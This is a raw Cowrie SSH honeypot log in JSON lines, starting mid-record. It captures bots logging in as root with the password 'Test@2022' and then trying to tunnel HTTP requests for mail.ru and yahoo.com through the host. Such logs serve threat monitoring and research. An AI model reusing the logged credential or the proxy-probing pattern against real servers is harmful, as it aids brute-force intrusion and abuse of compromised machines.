6-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:02.305186Z","src_ip":"77.83.207.83","session":"3f0aa9e12994"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:02.571154Z","src_ip":"77.83.207.83","session":"3f0aa9e12994"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":18610,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:18610","sensor":"my-vps","timestamp":"2025-08-31T03:53:02.625298Z","session":"3f0aa9e12994"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:02.678703Z","src_ip":"77.83.207.83","session":"3f0aa9e12994"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":15217,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:15217","sensor":"my-vps","timestamp":"2025-08-31T03:53:02.827634Z","session":"3f0aa9e12994"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:02.880809Z","src_ip":"77.83.207.83","session":"3f0aa9e12994"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":17030,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:17030","sensor":"my-vps","timestamp":"2025-08-31T03:53:03.027654Z","session":"3f0aa9e12994"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:03.081260Z","src_ip":"77.83.207.83","session":"3f0aa9e12994"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:03.135296Z","src_ip":"77.83.207.83","session":"3f0aa9e12994"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":38285,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9842ba11041","protocol":"ssh","message":"New connection: 77.83.207.83:38285 (1.2.3.4:22) [session: d9842ba11041]","sensor":"my-vps","timestamp":"2025-08-31T03:53:03.183378Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:03.193866Z","src_ip":"77.83.207.83","session":"d9842ba11041"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:03.233376Z","src_ip":"77.83.207.83","session":"d9842ba11041"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:03.480809Z","src_ip":"77.83.207.83","session":"d9842ba11041"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":26629,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:26629","sensor":"my-vps","timestamp":"2025-08-31T03:53:03.531495Z","session":"d9842ba11041"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:03.581254Z","src_ip":"77.83.207.83","session":"d9842ba11041"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":26076,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:26076","sensor":"my-vps","timestamp":"2025-08-31T03:53:03.723991Z","session":"d9842ba11041"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:03.773747Z","src_ip":"77.83.207.83","session":"d9842ba11041"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":15931,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:15931","sensor":"my-vps","timestamp":"2025-08-31T03:53:03.916285Z","session":"d9842ba11041"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:03.966070Z","src_ip":"77.83.207.83","session":"d9842ba11041"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:04.016708Z","src_ip":"77.83.207.83","session":"d9842ba11041"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":38394,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4cfe76cc3e7","protocol":"ssh","message":"New connection: 77.83.207.83:38394 (1.2.3.4:22) [session: e4cfe76cc3e7]","sensor":"my-vps","timestamp":"2025-08-31T03:53:04.066900Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:04.076960Z","src_ip":"77.83.207.83","session":"e4cfe76cc3e7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:04.118029Z","src_ip":"77.83.207.83","session":"e4cfe76cc3e7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34576,"dst_ip":"1.2.3.4","dst_port":22,"session":"ead6d7bc14a0","protocol":"ssh","message":"New connection: 212.227.125.160:34576 (1.2.3.4:22) [session: ead6d7bc14a0]","sensor":"my-vps","timestamp":"2025-08-31T03:53:04.225898Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:04.371509Z","src_ip":"77.83.207.83","session":"e4cfe76cc3e7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":25657,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:25657","sensor":"my-vps","timestamp":"2025-08-31T03:53:04.424394Z","session":"e4cfe76cc3e7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:04.475388Z","src_ip":"77.83.207.83","session":"e4cfe76cc3e7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":24268,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:24268","sensor":"my-vps","timestamp":"2025-08-31T03:53:04.617245Z","session":"e4cfe76cc3e7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:04.668112Z","src_ip":"77.83.207.83","session":"e4cfe76cc3e7"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:53:04.771648Z","src_ip":"212.227.125.160","session":"ead6d7bc14a0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:53:04.772496Z","src_ip":"212.227.125.160","session":"ead6d7bc14a0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":24649,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:24649","sensor":"my-vps","timestamp":"2025-08-31T03:53:04.813102Z","session":"e4cfe76cc3e7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:04.863979Z","src_ip":"77.83.207.83","session":"e4cfe76cc3e7"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:04.916577Z","src_ip":"77.83.207.83","session":"e4cfe76cc3e7"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":38500,"dst_ip":"1.2.3.4","dst_port":22,"session":"c046eb605d93","protocol":"ssh","message":"New connection: 77.83.207.83:38500 (1.2.3.4:22) [session: c046eb605d93]","sensor":"my-vps","timestamp":"2025-08-31T03:53:04.965606Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:04.966269Z","src_ip":"77.83.207.83","session":"c046eb605d93"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:05.016973Z","src_ip":"77.83.207.83","session":"c046eb605d93"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:05.266828Z","src_ip":"77.83.207.83","session":"c046eb605d93"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":24322,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:24322","sensor":"my-vps","timestamp":"2025-08-31T03:53:05.318888Z","session":"c046eb605d93"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:05.368991Z","src_ip":"77.83.207.83","session":"c046eb605d93"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":24511,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:24511","sensor":"my-vps","timestamp":"2025-08-31T03:53:05.512479Z","session":"c046eb605d93"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:05.562706Z","src_ip":"77.83.207.83","session":"c046eb605d93"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":26920,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:26920","sensor":"my-vps","timestamp":"2025-08-31T03:53:05.704556Z","session":"c046eb605d93"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:05.754816Z","src_ip":"77.83.207.83","session":"c046eb605d93"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:05.805844Z","src_ip":"77.83.207.83","session":"c046eb605d93"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":38598,"dst_ip":"1.2.3.4","dst_port":22,"session":"9780ea5d160d","protocol":"ssh","message":"New connection: 77.83.207.83:38598 (1.2.3.4:22) [session: 9780ea5d160d]","sensor":"my-vps","timestamp":"2025-08-31T03:53:05.855308Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:05.856274Z","src_ip":"77.83.207.83","session":"9780ea5d160d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:05.906686Z","src_ip":"77.83.207.83","session":"9780ea5d160d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:06.158803Z","src_ip":"77.83.207.83","session":"9780ea5d160d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":3932,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:3932","sensor":"my-vps","timestamp":"2025-08-31T03:53:06.210142Z","session":"9780ea5d160d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:06.260770Z","src_ip":"77.83.207.83","session":"9780ea5d160d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":16703,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:16703","sensor":"my-vps","timestamp":"2025-08-31T03:53:06.404729Z","session":"9780ea5d160d"}
